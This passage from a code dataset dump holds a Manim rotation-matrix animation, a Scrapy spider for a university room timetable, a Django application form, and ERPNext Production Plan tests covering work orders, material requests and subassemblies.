\\end{bmatrix}\")\n formula_tex1.scale(1)\n\n formula_tex2 = Tex(r\"\\left[\\begin{array}{cc|c} cos(2 \\pi / 3) & -sin(2 \\pi / 3) & 0 \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) & 0 \\\\ \\hline 0 & 0 & 1 \\end{array}\\right] \\quad \\left[\\begin{array}{c} x \\\\ y \\\\ \\hline z \\end{array} \\right]\")\n \n formula_tex3 = Tex(r\"\\begin{bmatrix} cos(2 \\pi / 3) & -sin(2 \\pi / 3) \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) \\\\ \\end{bmatrix} \\begin{bmatrix} x \\\\ y \\\\ \\end{bmatrix}\")\n formula_tex4 = Tex(r\"\\begin{bmatrix} 1 \\end{bmatrix} \\begin{bmatrix} z \\end{bmatrix}\")\n formula_tex3.scale(1)\n formula_tex2.scale(1)\n self.play(Write(formula_tex1))\n self.wait()\n self.clear()\n self.play(Write(formula_tex2))\n self.wait()\n self.play(formula_tex2.to_edge, UP)\n self.play(Write(formula_tex3))\n self.wait()\n self.play(formula_tex3.to_edge, LEFT)\n formula_tex4.to_edge(RIGHT)\n self.play(Write(formula_tex4))\n self.wait()\n\n\n\n\n","repo_name":"chemicalfiend/MyAnimations","sub_path":"tests/representation.py","file_name":"representation.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17226501072","text":"#!/usr/bin/env python2\n \nimport scrapy\n\nclass RoomSpider(scrapy.Spider):\n \n #CONCURRENT_REQUESTS = 200 \n CONCURRENT_REQUESTS = 20 \n URL = 'https://sws.unimelb.edu.au/2017/'\n \n name = \"room\"\n start_urls = [URL]\n rooms = []\n custom_settings = {\n 'CONCURRENT_REQUESTS': 1\n }\n\n def parse(self, response):\n return scrapy.FormRequest.from_response(\n response,\n formdata = {'__EVENTTARGET': 'LinkBtn_locations', '__EVENTARGUMENT': ''},\n callback = self.process_rooms\n )\n\n def process_rooms(self, response):\n self.rooms = response.xpath('//select[@id=\"dlObject\"]/option/@value').extract()\n self.submission_response = response\n return self.post_data()\n\n def post_data(self):\n c = self.CONCURRENT_REQUESTS\n _d = []\n while c > 0 and len(self.rooms) > 0:\n c -= 1\n _d.append(self.rooms.pop())\n\n return scrapy.FormRequest.from_response(\n self.submission_response, \n clickdata = {'name': 'bGetTimetable'}, \n formdata = {'dlObject': _d,'lbWeeks': 't', 'RadioType': 'location_list;cyon_reports_list_url;dummy'}, \n dont_filter = True,\n callback = self.get_data\n )\n\n def get_data(self, response):\n return scrapy.Request(\n url = self.URL + \"Reports/List.aspx\", \n dont_filter = True,\n callback = self._save\n )\n\n def _save(self, response):\n self.save_room(response)\n return self.post_data()\n\n def save_room(self, response):\n print(response.text);\n\n","repo_name":"teaso/UniMelb-RoomFinder","sub_path":"room_scrape.py","file_name":"room_scrape.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31013415501","text":"from django import forms\nfrom .models import Application\nfrom django.utils.translation import gettext_lazy as _\n\nclass ApplicationForm(forms.ModelForm):\n name = forms.CharField(label=_(\"ФИО\"), max_length=50, widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n email = forms.EmailField(label=\"Email\", widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n phone_number = forms.CharField(label=_(\"Номер телефона\"), max_length=30, widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n Comment = forms.CharField(label=_(\"Ваше сообщение\"), widget=forms.Textarea(attrs={'class': 'form-control', 'cols': 30, 'rows': 10}), required=False)\n\n\n class Meta:\n model = Application\n fields = ['name', 'email', 'phone_number', 'Comment']","repo_name":"VladlenKhan/tts","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38141815879","text":"import frappe\nfrom frappe.tests.utils import FrappeTestCase\nfrom frappe.utils import add_to_date, flt, now_datetime, nowdate\n\nfrom erpnext.controllers.item_variant import create_variant\nfrom erpnext.manufacturing.doctype.production_plan.production_plan import (\n\tget_items_for_material_requests,\n\tget_sales_orders,\n\tget_warehouse_list,\n)\nfrom erpnext.manufacturing.doctype.work_order.work_order import OverProductionError\nfrom erpnext.selling.doctype.sales_order.test_sales_order import make_sales_order\nfrom erpnext.stock.doctype.item.test_item import create_item\nfrom erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry\nfrom erpnext.stock.doctype.stock_reconciliation.test_stock_reconciliation import (\n\tcreate_stock_reconciliation,\n)\n\n\nclass TestProductionPlan(FrappeTestCase):\n\tdef setUp(self):\n\t\tfor item in [\n\t\t\t\"Test Production Item 1\",\n\t\t\t\"Subassembly Item 1\",\n\t\t\t\"Raw Material Item 1\",\n\t\t\t\"Raw Material Item 2\",\n\t\t]:\n\t\t\tcreate_item(item, valuation_rate=100)\n\n\t\t\tsr = frappe.db.get_value(\n\t\t\t\t\"Stock Reconciliation Item\", {\"item_code\": item, \"docstatus\": 1}, \"parent\"\n\t\t\t)\n\t\t\tif sr:\n\t\t\t\tsr_doc = frappe.get_doc(\"Stock Reconciliation\", sr)\n\t\t\t\tsr_doc.cancel()\n\n\t\tcreate_item(\"Test Non Stock Raw Material\", is_stock_item=0)\n\t\tfor item, raw_materials in {\n\t\t\t\"Subassembly Item 1\": [\"Raw Material Item 1\", \"Raw Material Item 2\"],\n\t\t\t\"Test Production Item 1\": [\n\t\t\t\t\"Raw Material Item 1\",\n\t\t\t\t\"Subassembly Item 1\",\n\t\t\t\t\"Test Non Stock Raw Material\",\n\t\t\t],\n\t\t}.items():\n\t\t\tif not frappe.db.get_value(\"BOM\", {\"item\": item}):\n\t\t\t\tmake_bom(item=item, raw_materials=raw_materials)\n\n\tdef tearDown(self) -> None:\n\t\tfrappe.db.rollback()\n\n\tdef test_production_plan_mr_creation(self):\n\t\t\"Test if MRs are created for unavailable raw materials.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\")\n\t\tself.assertTrue(len(pln.mr_items), 2)\n\n\t\tpln.make_material_request()\n\t\tpln.reload()\n\t\tself.assertTrue(pln.status, \"Material Requested\")\n\n\t\tmaterial_requests = frappe.get_all(\n\t\t\t\"Material Request Item\",\n\t\t\tfields=[\"distinct parent\"],\n\t\t\tfilters={\"production_plan\": pln.name},\n\t\t\tas_list=1,\n\t\t)\n\n\t\tself.assertTrue(len(material_requests), 2)\n\n\t\tpln.make_work_order()\n\t\twork_orders = frappe.get_all(\n\t\t\t\"Work Order\", fields=[\"name\"], filters={\"production_plan\": pln.name}, as_list=1\n\t\t)\n\n\t\tself.assertTrue(len(work_orders), len(pln.po_items))\n\n\t\tfor name in material_requests:\n\t\t\tmr = frappe.get_doc(\"Material Request\", name[0])\n\t\t\tif mr.docstatus != 0:\n\t\t\t\tmr.cancel()\n\n\t\tfor name in work_orders:\n\t\t\tmr = frappe.delete_doc(\"Work Order\", name[0])\n\n\t\tpln = frappe.get_doc(\"Production Plan\", pln.name)\n\t\tpln.cancel()\n\n\tdef test_production_plan_start_date(self):\n\t\t\"Test if Work Order has same Planned Start Date as Prod Plan.\"\n\t\tplanned_date = add_to_date(date=None, days=3)\n\t\tplan = create_production_plan(\n\t\t\titem_code=\"Test Production Item 1\", planned_start_date=planned_date\n\t\t)\n\t\tplan.make_work_order()\n\n\t\twork_orders = frappe.get_all(\n\t\t\t\"Work Order\", fields=[\"name\", \"planned_start_date\"], filters={\"production_plan\": plan.name}\n\t\t)\n\n\t\tself.assertEqual(work_orders[0].planned_start_date, planned_date)\n\n\t\tfor wo in work_orders:\n\t\t\tfrappe.delete_doc(\"Work Order\", wo.name)\n\n\t\tplan.reload()\n\t\tplan.cancel()\n\n\tdef test_production_plan_for_existing_ordered_qty(self):\n\t\t\"\"\"\n\t\t- Enable 'ignore_existing_ordered_qty'.\n\t\t- Test if MR Planning table pulls Raw Material Qty even if it is in stock.\n\t\t\"\"\"\n\t\tsr1 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=110\n\t\t)\n\t\tsr2 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"_Test Warehouse - _TC\", qty=1, rate=120\n\t\t)\n\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", ignore_existing_ordered_qty=1)\n\t\tself.assertTrue(len(pln.mr_items))\n\t\tself.assertTrue(flt(pln.mr_items[0].quantity), 1.0)\n\n\t\tsr1.cancel()\n\t\tsr2.cancel()\n\t\tpln.cancel()\n\n\tdef test_production_plan_with_non_stock_item(self):\n\t\t\"Test if MR Planning table includes Non Stock RM.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", include_non_stock_items=1)\n\t\tself.assertTrue(len(pln.mr_items), 3)\n\t\tpln.cancel()\n\n\tdef test_production_plan_without_multi_level(self):\n\t\t\"Test MR Planning table for non exploded BOM.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", use_multi_level_bom=0)\n\t\tself.assertTrue(len(pln.mr_items), 2)\n\t\tpln.cancel()\n\n\tdef test_production_plan_without_multi_level_for_existing_ordered_qty(self):\n\t\t\"\"\"\n\t\t- Disable 'ignore_existing_ordered_qty'.\n\t\t- Test if MR Planning table avoids pulling Raw Material Qty as it is in stock for\n\t\tnon exploded BOM.\n\t\t\"\"\"\n\t\tsr1 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=130\n\t\t)\n\t\tsr2 = create_stock_reconciliation(\n\t\t\titem_code=\"Subassembly Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=140\n\t\t)\n\n\t\tpln = create_production_plan(\n\t\t\titem_code=\"Test Production Item 1\", use_multi_level_bom=0, ignore_existing_ordered_qty=0\n\t\t)\n\t\tself.assertFalse(len(pln.mr_items))\n\n\t\tsr1.cancel()\n\t\tsr2.cancel()\n\t\tpln.cancel()\n\n\tdef test_production_plan_sales_orders(self):\n\t\t\"Test if previously fulfilled SO (with WO) is pulled into Prod Plan.\"\n\t\titem = \"Test Production Item 1\"\n\t\tso = make_sales_order(item_code=item, qty=1)\n\t\tsales_order = so.name\n\t\tsales_order_item = so.items[0].name\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = so.company\n\t\tpln.get_items_from = \"Sales Order\"\n\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so.name,\n\t\t\t\t\"sales_order_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"grand_total\": so.grand_total,\n\t\t\t},\n\t\t)\n\n\t\tpln.get_so_items()\n\t\tpln.submit()\n\t\tpln.make_work_order()\n\n\t\twork_order = frappe.db.get_value(\n\t\t\t\"Work Order\",\n\t\t\t{\"sales_order\": sales_order, \"production_plan\": pln.name, \"sales_order_item\": sales_order_item},\n\t\t\t\"name\",\n\t\t)\n\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t)\n\t\two_doc.submit()\n\n\t\tso_wo_qty = frappe.db.get_value(\"Sales Order Item\", sales_order_item, \"work_order_qty\")\n\t\tself.assertTrue(so_wo_qty, 5)\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.update(\n\t\t\t{\n\t\t\t\t\"from_date\": so.transaction_date,\n\t\t\t\t\"to_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"item_code\": item,\n\t\t\t\t\"sales_order_status\": so.status,\n\t\t\t}\n\t\t)\n\t\tsales_orders = get_sales_orders(pln) or {}\n\t\tsales_orders = [d.get(\"name\") for d in sales_orders if d.get(\"name\") == sales_order]\n\n\t\tself.assertEqual(sales_orders, [])\n\n\tdef test_production_plan_combine_items(self):\n\t\t\"Test combining FG items in Production Plan.\"\n\t\titem = \"Test Production Item 1\"\n\t\tso1 = make_sales_order(item_code=item, qty=1)\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = so1.company\n\t\tpln.get_items_from = \"Sales Order\"\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so1.name,\n\t\t\t\t\"sales_order_date\": so1.transaction_date,\n\t\t\t\t\"customer\": so1.customer,\n\t\t\t\t\"grand_total\": so1.grand_total,\n\t\t\t},\n\t\t)\n\t\tso2 = make_sales_order(item_code=item, qty=2)\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so2.name,\n\t\t\t\t\"sales_order_date\": so2.transaction_date,\n\t\t\t\t\"customer\": so2.customer,\n\t\t\t\t\"grand_total\": so2.grand_total,\n\t\t\t},\n\t\t)\n\t\tpln.combine_items = 1\n\t\tpln.get_items()\n\t\tpln.submit()\n\n\t\tself.assertTrue(pln.po_items[0].planned_qty, 3)\n\n\t\tpln.make_work_order()\n\t\twork_order = frappe.db.get_value(\n\t\t\t\"Work Order\",\n\t\t\t{\"production_plan_item\": pln.po_items[0].name, \"production_plan\": pln.name},\n\t\t\t\"name\",\n\t\t)\n\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\n\t\t\t\t\"wip_warehouse\": \"Work In Progress - _TC\",\n\t\t\t}\n\t\t)\n\n\t\two_doc.submit()\n\t\tso_items = []\n\t\tfor plan_reference in pln.prod_plan_references:\n\t\t\tso_items.append(plan_reference.sales_order_item)\n\t\t\tso_wo_qty = frappe.db.get_value(\n\t\t\t\t\"Sales Order Item\", plan_reference.sales_order_item, \"work_order_qty\"\n\t\t\t)\n\t\t\tself.assertEqual(so_wo_qty, plan_reference.qty)\n\n\t\two_doc.cancel()\n\t\tfor so_item in so_items:\n\t\t\tso_wo_qty = frappe.db.get_value(\"Sales Order Item\", so_item, \"work_order_qty\")\n\t\t\tself.assertEqual(so_wo_qty, 0.0)\n\n\t\tpln.reload()\n\t\tpln.cancel()\n\n\tdef test_production_plan_combine_subassembly(self):\n\t\t\"\"\"\n\t\tTest combining Sub assembly items belonging to the same BOM in Prod Plan.\n\t\t1) Red-Car -> Wheel (sub assembly) > BOM-WHEEL-001\n\t\t2) Green-Car -> Wheel (sub assembly) > BOM-WHEEL-001\n\t\t\"\"\"\n\t\tfrom erpnext.manufacturing.doctype.bom.test_bom import create_nested_bom\n\n\t\tbom_tree_1 = {\"Red-Car\": {\"Wheel\": {\"Rubber\": {}}}}\n\t\tbom_tree_2 = {\"Green-Car\": {\"Wheel\": {\"Rubber\": {}}}}\n\n\t\tparent_bom_1 = create_nested_bom(bom_tree_1, prefix=\"\")\n\t\tparent_bom_2 = create_nested_bom(bom_tree_2, prefix=\"\")\n\n\t\t# make sure both boms use same subassembly bom\n\t\tsubassembly_bom = parent_bom_1.items[0].bom_no\n\t\tfrappe.db.set_value(\"BOM Item\", parent_bom_2.items[0].name, \"bom_no\", subassembly_bom)\n\n\t\tplan = create_production_plan(item_code=\"Red-Car\", use_multi_level_bom=1, do_not_save=True)\n\t\tplan.append(\n\t\t\t\"po_items\",\n\t\t\t{ # Add Green-Car to Prod Plan\n\t\t\t\t\"use_multi_level_bom\": 1,\n\t\t\t\t\"item_code\": \"Green-Car\",\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", \"Green-Car\", \"default_bom\"),\n\t\t\t\t\"planned_qty\": 1,\n\t\t\t\t\"planned_start_date\": now_datetime(),\n\t\t\t},\n\t\t)\n\t\tplan.get_sub_assembly_items()\n\t\tself.assertTrue(len(plan.sub_assembly_items), 2)\n\n\t\tplan.combine_sub_items = 1\n\t\tplan.get_sub_assembly_items()\n\n\t\tself.assertTrue(len(plan.sub_assembly_items), 1) # check if sub-assembly items merged\n\t\tself.assertEqual(plan.sub_assembly_items[0].qty, 2.0)\n\t\tself.assertEqual(plan.sub_assembly_items[0].stock_qty, 2.0)\n\n\t\t# change warehouse in one row, sub-assemblies should not merge\n\t\tplan.po_items[0].warehouse = \"Finished Goods - _TC\"\n\t\tplan.get_sub_assembly_items()\n\t\tself.assertTrue(len(plan.sub_assembly_items), 2)\n\n\tdef test_pp_to_mr_customer_provided(self):\n\t\t\"Test Material Request from Production Plan for Customer Provided Item.\"\n\t\tcreate_item(\n\t\t\t\"CUST-0987\", is_customer_provided_item=1, customer=\"_Test Customer\", is_purchase_item=0\n\t\t)\n\t\tcreate_item(\"Production Item CUST\")\n\n\t\tfor item, raw_materials in {\n\t\t\t\"Production Item CUST\": [\"Raw Material Item 1\", \"CUST-0987\"]\n\t\t}.items():\n\t\t\tif not frappe.db.get_value(\"BOM\", {\"item\": item}):\n\t\t\t\tmake_bom(item=item, raw_materials=raw_materials)\n\t\tproduction_plan = create_production_plan(item_code=\"Production Item CUST\")\n\t\tproduction_plan.make_material_request()\n\n\t\tmaterial_request = frappe.db.get_value(\n\t\t\t\"Material Request Item\",\n\t\t\t{\"production_plan\": production_plan.name, \"item_code\": \"CUST-0987\"},\n\t\t\t\"parent\",\n\t\t)\n\t\tmr = frappe.get_doc(\"Material Request\", material_request)\n\n\t\tself.assertTrue(mr.material_request_type, \"Customer Provided\")\n\t\tself.assertTrue(mr.customer, \"_Test Customer\")\n\n\tdef test_production_plan_with_multi_level_bom(self):\n\t\t\"\"\"\n\t\tItem Code\t|\tQty\t|\n\t\t|Test BOM 1\t|\t1\t|\n\t\t|Test BOM 2\t|\t2\t|\n\t\t|Test BOM 3\t|\t3\t|\n\t\t\"\"\"\n\n\t\tfor item_code in [\"Test BOM 1\", \"Test BOM 2\", \"Test BOM 3\", \"Test RM BOM 1\"]:\n\t\t\tcreate_item(item_code, is_stock_item=1)\n\n\t\t# created bom upto 3 level\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 3\"}):\n\t\t\tmake_bom(item=\"Test BOM 3\", raw_materials=[\"Test RM BOM 1\"], rm_qty=3)\n\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 2\"}):\n\t\t\tmake_bom(item=\"Test BOM 2\", raw_materials=[\"Test BOM 3\"], rm_qty=3)\n\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 1\"}):\n\t\t\tmake_bom(item=\"Test BOM 1\", raw_materials=[\"Test BOM 2\"], rm_qty=2)\n\n\t\titem_code = \"Test BOM 1\"\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = \"_Test Company\"\n\t\tpln.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"item_code\": item_code,\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 1\"}),\n\t\t\t\t\"planned_qty\": 3,\n\t\t\t},\n\t\t)\n\n\t\tpln.get_sub_assembly_items(\"In House\")\n\t\tpln.submit()\n\t\tpln.make_work_order()\n\n\t\t# last level sub-assembly work order produce qty\n\t\tto_produce_qty = frappe.db.get_value(\n\t\t\t\"Work Order\", {\"production_plan\": pln.name, \"production_item\": \"Test BOM 3\"}, \"qty\"\n\t\t)\n\n\t\tself.assertEqual(to_produce_qty, 18.0)\n\t\tpln.cancel()\n\t\tfrappe.delete_doc(\"Production Plan\", pln.name)\n\n\tdef test_get_warehouse_list_group(self):\n\t\t\"Check if required child warehouses are returned.\"\n\t\twarehouse_json = '[{\"warehouse\":\"_Test Warehouse Group - _TC\"}]'\n\n\t\twarehouses = set(get_warehouse_list(warehouse_json))\n\t\texpected_warehouses = {\"_Test Warehouse Group-C1 - _TC\", \"_Test Warehouse Group-C2 - _TC\"}\n\n\t\tmissing_warehouse = expected_warehouses - warehouses\n\n\t\tself.assertTrue(\n\t\t\tlen(missing_warehouse) == 0,\n\t\t\tmsg=f\"Following warehouses were expected {', '.join(missing_warehouse)}\",\n\t\t)\n\n\tdef test_get_warehouse_list_single(self):\n\t\t\"Check if same warehouse is returned in absence of child warehouses.\"\n\t\twarehouse_json = '[{\"warehouse\":\"_Test Scrap Warehouse - _TC\"}]'\n\n\t\twarehouses = set(get_warehouse_list(warehouse_json))\n\t\texpected_warehouses = {\n\t\t\t\"_Test Scrap Warehouse - _TC\",\n\t\t}\n\n\t\tself.assertEqual(warehouses, expected_warehouses)\n\n\tdef test_get_sales_order_with_variant(self):\n\t\t\"Check if Template BOM is fetched in absence of Variant BOM.\"\n\t\trm_item = create_item(\"PIV_RM\", valuation_rate=100)\n\t\tif not frappe.db.exists(\"Item\", {\"item_code\": \"PIV\"}):\n\t\t\titem = create_item(\"PIV\", valuation_rate=100)\n\t\t\tvariant_settings = {\n\t\t\t\t\"attributes\": [\n\t\t\t\t\t{\"attribute\": \"Colour\"},\n\t\t\t\t],\n\t\t\t\t\"has_variants\": 1,\n\t\t\t}\n\t\t\titem.update(variant_settings)\n\t\t\titem.save()\n\t\t\tparent_bom = make_bom(item=\"PIV\", raw_materials=[rm_item.item_code])\n\t\tif not frappe.db.exists(\"BOM\", {\"item\": \"PIV\"}):\n\t\t\tparent_bom = make_bom(item=\"PIV\", raw_materials=[rm_item.item_code])\n\t\telse:\n\t\t\tparent_bom = frappe.get_doc(\"BOM\", {\"item\": \"PIV\"})\n\n\t\tif not frappe.db.exists(\"Item\", {\"item_code\": \"PIV-RED\"}):\n\t\t\tvariant = create_variant(\"PIV\", {\"Colour\": \"Red\"})\n\t\t\tvariant.save()\n\t\t\tvariant_bom = make_bom(item=variant.item_code, raw_materials=[rm_item.item_code])\n\t\telse:\n\t\t\tvariant = frappe.get_doc(\"Item\", \"PIV-RED\")\n\t\tif not frappe.db.exists(\"BOM\", {\"item\": \"PIV-RED\"}):\n\t\t\tvariant_bom = make_bom(item=variant.item_code, raw_materials=[rm_item.item_code])\n\n\t\t\"\"\"Testing when item variant has a BOM\"\"\"\n\t\tso = make_sales_order(item_code=\"PIV-RED\", qty=5)\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = so.company\n\t\tpln.get_items_from = \"Sales Order\"\n\t\tpln.item_code = \"PIV-RED\"\n\t\tpln.get_open_sales_orders()\n\t\tself.assertEqual(pln.sales_orders[0].sales_order, so.name)\n\t\tpln.get_so_items()\n\t\tself.assertEqual(pln.po_items[0].item_code, \"PIV-RED\")\n\t\tself.assertEqual(pln.po_items[0].bom_no, variant_bom.name)\n\t\tso.cancel()\n\t\tfrappe.delete_doc(\"Sales Order\", so.name)\n\t\tvariant_bom.cancel()\n\t\tfrappe.delete_doc(\"BOM\", variant_bom.name)\n\n\t\t\"\"\"Testing when item variant doesn't have a BOM\"\"\"\n\t\tso = make_sales_order(item_code=\"PIV-RED\", qty=5)\n\t\tpln.get_open_sales_orders()\n\t\tself.assertEqual(pln.sales_orders[0].sales_order, so.name)\n\t\tpln.po_items = []\n\t\tpln.get_so_items()\n\t\tself.assertEqual(pln.po_items[0].item_code, \"PIV-RED\")\n\t\tself.assertEqual(pln.po_items[0].bom_no, parent_bom.name)\n\n\t\tfrappe.db.rollback()\n\n\tdef test_subassmebly_sorting(self):\n\t\t\"Test subassembly sorting in case of multiple items with nested BOMs.\"\n\t\tfrom erpnext.manufacturing.doctype.bom.test_bom import create_nested_bom\n\n\t\tprefix = \"_TestLevel_\"\n\t\tboms = {\n\t\t\t\"Assembly\": {\n\t\t\t\t\"SubAssembly1\": {\n\t\t\t\t\t\"ChildPart1\": {},\n\t\t\t\t\t\"ChildPart2\": {},\n\t\t\t\t},\n\t\t\t\t\"ChildPart6\": {},\n\t\t\t\t\"SubAssembly4\": {\"SubSubAssy2\": {\"ChildPart7\": {}}},\n\t\t\t},\n\t\t\t\"MegaDeepAssy\": {\n\t\t\t\t\"SecretSubassy\": {\n\t\t\t\t\t\"SecretPart\": {\"VerySecret\": {\"SuperSecret\": {\"Classified\": {}}}},\n\t\t\t\t},\n\t\t\t\t# ^ assert that this is\n\t\t\t\t# first item in subassy table\n\t\t\t},\n\t\t}\n\t\tcreate_nested_bom(boms, prefix=prefix)\n\n\t\titems = [prefix + item_code for item_code in boms.keys()]\n\t\tplan = create_production_plan(item_code=items[0], do_not_save=True)\n\t\tplan.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"use_multi_level_bom\": 1,\n\t\t\t\t\"item_code\": items[1],\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", items[1], \"default_bom\"),\n\t\t\t\t\"planned_qty\": 1,\n\t\t\t\t\"planned_start_date\": now_datetime(),\n\t\t\t},\n\t\t)\n\t\tplan.get_sub_assembly_items()\n\n\t\tbom_level_order = [d.bom_level for d in plan.sub_assembly_items]\n\t\tself.assertEqual(bom_level_order, sorted(bom_level_order, reverse=True))\n\t\t# lowest most level of subassembly should be first\n\t\tself.assertIn(\"SuperSecret\", plan.sub_assembly_items[0].production_item)\n\n\tdef test_multiple_work_order_for_production_plan_item(self):\n\t\t\"Test producing Prod Plan (making WO) in parts.\"\n\n\t\tdef create_work_order(item, pln, qty):\n\t\t\t# Get Production Items\n\t\t\titems_data = pln.get_production_items()\n\n\t\t\t# Update qty\n\t\t\titems_data[(item, None, None)][\"qty\"] = qty\n\n\t\t\t# Create and Submit Work Order for each item in items_data\n\t\t\tfor key, item in items_data.items():\n\t\t\t\tif pln.sub_assembly_items:\n\t\t\t\t\titem[\"use_multi_level_bom\"] = 0\n\n\t\t\t\two_name = pln.create_work_order(item)\n\t\t\t\two_doc = frappe.get_doc(\"Work Order\", wo_name)\n\t\t\t\two_doc.update(\n\t\t\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t\t\t)\n\t\t\t\two_doc.submit()\n\t\t\t\two_list.append(wo_name)\n\n\t\titem = \"Test Production Item 1\"\n\t\traw_materials = [\"Raw Material Item 1\", \"Raw Material Item 2\"]\n\n\t\t# Create BOM\n\t\tbom = make_bom(item=item, raw_materials=raw_materials)\n\n\t\t# Create Production Plan\n\t\tpln = create_production_plan(item_code=bom.item, planned_qty=5)\n\n\t\t# All the created Work Orders\n\t\two_list = []\n\n\t\t# Create and Submit 1st Work Order for 3 qty\n\t\tcreate_work_order(item, pln, 3)\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 3)\n\n\t\t# Create and Submit 2nd Work Order for 2 qty\n\t\tcreate_work_order(item, pln, 2)\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 5)\n\n\t\t# Overproduction\n\t\tself.assertRaises(OverProductionError, create_work_order, item=item, pln=pln, qty=2)\n\n\t\t# Cancel 1st Work Order\n\t\two1 = frappe.get_doc(\"Work Order\", wo_list[0])\n\t\two1.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 2)\n\n\t\t# Cancel 2nd Work Order\n\t\two2 = frappe.get_doc(\"Work Order\", wo_list[1])\n\t\two2.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 0)\n\n\tdef test_production_plan_pending_qty_with_sales_order(self):\n\t\t\"\"\"\n\t\tTest Prod Plan impact via: SO -> Prod Plan -> WO -> SE -> SE (cancel)\n\t\t\"\"\"\n\t\tfrom erpnext.manufacturing.doctype.work_order.test_work_order import make_wo_order_test_record\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import (\n\t\t\tmake_stock_entry as make_se_from_wo,\n\t\t)\n\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\n\t\titem = \"Test Production Item 1\"\n\t\tso = make_sales_order(item_code=item, qty=1)\n\n\t\tpln = create_production_plan(\n\t\t\tcompany=so.company, get_items_from=\"Sales Order\", sales_order=so, skip_getting_mr_items=True\n\t\t)\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\t\two = make_wo_order_test_record(\n\t\t\titem_code=item,\n\t\t\tqty=1,\n\t\t\tcompany=so.company,\n\t\t\twip_warehouse=\"Work In Progress - _TC\",\n\t\t\tfg_warehouse=\"Finished Goods - _TC\",\n\t\t\tskip_transfer=1,\n\t\t\tuse_multi_level_bom=1,\n\t\t\tdo_not_submit=True,\n\t\t)\n\t\two.production_plan = pln.name\n\t\two.production_plan_item = pln.po_items[0].name\n\t\two.submit()\n\n\t\tse = frappe.get_doc(make_se_from_wo(wo.name, \"Manufacture\", 1))\n\t\tse.submit()\n\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 0)\n\n\t\tse.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\tdef test_production_plan_pending_qty_independent_items(self):\n\t\t\"Test Prod Plan impact if items are added independently (no from SO or MR).\"\n\t\tfrom erpnext.manufacturing.doctype.work_order.test_work_order import make_wo_order_test_record\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import (\n\t\t\tmake_stock_entry as make_se_from_wo,\n\t\t)\n\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"Work In Progress - _TC\", qty=2, 